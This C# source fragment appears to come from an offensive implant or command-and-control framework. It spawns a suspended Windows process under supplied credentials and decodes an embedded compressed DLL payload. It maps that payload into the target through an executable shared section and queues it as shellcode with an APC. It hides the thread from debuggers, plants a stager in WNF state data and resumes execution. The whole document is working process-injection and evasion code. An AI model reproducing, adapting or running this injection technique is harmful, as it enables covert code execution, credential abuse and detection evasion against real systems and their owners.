public static bool CreateProcessWithLogonW(string username, string password, string domain, string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation)
{
Natives.STARTUPINFO startupInfo = new Natives.STARTUPINFO();
startupInfo.cb = (uint)Marshal.SizeOf(typeof(Natives.STARTUPINFO));
if (!Natives.CreateProcessWithLogonW(username, domain, password,
Natives.LogonFlags.NetCredentialsOnly, path + binary, path + binary + " " + arguments, cf, 0, path, ref startupInfo, out processInformation))
{
return(false);
}
Console.WriteLine("Process created");
return(true);
}
static void Execute(string [] args)
{
var startInfo = new Natives.STARTUPINFO();
Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
Natives.LARGE_INTEGER largeinteger = new Natives.LARGE_INTEGER();
Natives.SYSTEM_INFO info = new Natives.SYSTEM_INFO();
startInfo.cb = (uint)Marshal.SizeOf(startInfo);
Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES();
Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES();
pSec.nLength = Marshal.SizeOf(pSec);
tSec.nLength = Marshal.SizeOf(tSec);
IntPtr section = IntPtr.Zero;
uint size = 0;
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
IntPtr soffset = IntPtr.Zero;
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
IntPtr hToken = IntPtr.Zero;
IntPtr hProcTest = IntPtr.Zero;
IntPtr hTokenTest = IntPtr.Zero;
uint flags = Natives.CreateSuspended | Natives.CreateNoWindow;
try
{
if (Natives.CreateProcessWithLogonW("#USERNAME#", "#DOMAIN#", "#PASSWORD#", Natives.LogonFlags.NetCredentialsOnly, @"C:\Windows\System32\#SPAWN#", "", flags, (UInt32)0, "C:\\Windows\\System32", ref startInfo, out procInfo))
{
byte[] payload = DecompressDLL(Convert.FromBase64String(nutclr));
//Round payload size to page size
Natives.GetSystemInfo(ref info);
size = info.dwPageSize - (uint)payload.Length % info.dwPageSize + (uint)payload.Length;
largeinteger.LowPart = size;
//Crteate section in current process
var status = Natives.ZwCreateSection(ref section, Natives.GenericAll, IntPtr.Zero, ref largeinteger, Natives.PAGE_EXECUTE_READWRITE, Natives.SecCommit, IntPtr.Zero);
//Map section to current process
status = Natives.ZwMapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, IntPtr.Zero, IntPtr.Zero, soffset, ref viewSize, 1, 0, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddr != IntPtr.Zero)
{
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
status = Natives.ZwMapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref viewSizeEx, 1, 0, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddrEx != IntPtr.Zero && viewSizeEx != IntPtr.Zero)
{
//Unmap current process section
Natives.ZwUnmapViewOfSection(Natives.GetCurrentProcess(), baseAddr);
// Assign address of shellcode to the target thread apc queue
IntPtr th = procInfo.hThread;
IntPtr ptrq = Natives.ZwQueueApcThread(th, baseAddrEx, IntPtr.Zero);
Natives.ZwSetInformationThread(th, 1, IntPtr.Zero, 0);
//Before resuming the thread we write the stager on wnf
//so it can be read from the spawned process from other session
WriteWnF(task);
int rest = Natives.ZwResumeThread(th, out ulong outsupn);
}
else
{
Console.WriteLine("[x] Error mapping remote section");
File.WriteAllText(@"c:\temp\log.txt", "[x] Error mapping remote section");
}
}
else
{
Console.WriteLine("[x] Error mapping section to current process");
File.WriteAllText(@"c:\temp\log.txt", "[x] Error mapping section to current process");
}
Natives.CloseHandle(procInfo.hThread);
Natives.CloseHandle(procInfo.hProcess);
Natives.CloseHandle(hProcTest);
Natives.CloseHandle(hTokenTest);
}
else
{
Console.WriteLine("[x] Error creating process");
File.WriteAllText(@"c:\temp\log.txt", "[x] Error creating process " + Natives.GetLastError());
}
Natives.CloseHandle(hProcTest);
Natives.CloseHandle(hTokenTest);
}
catch (Exception e)
{
Console.WriteLine("[x] Generic error");
File.WriteAllText(@"c:\temp\log.txt", "[x] Generic error " + e.Message + " " + e.StackTrace);
}
}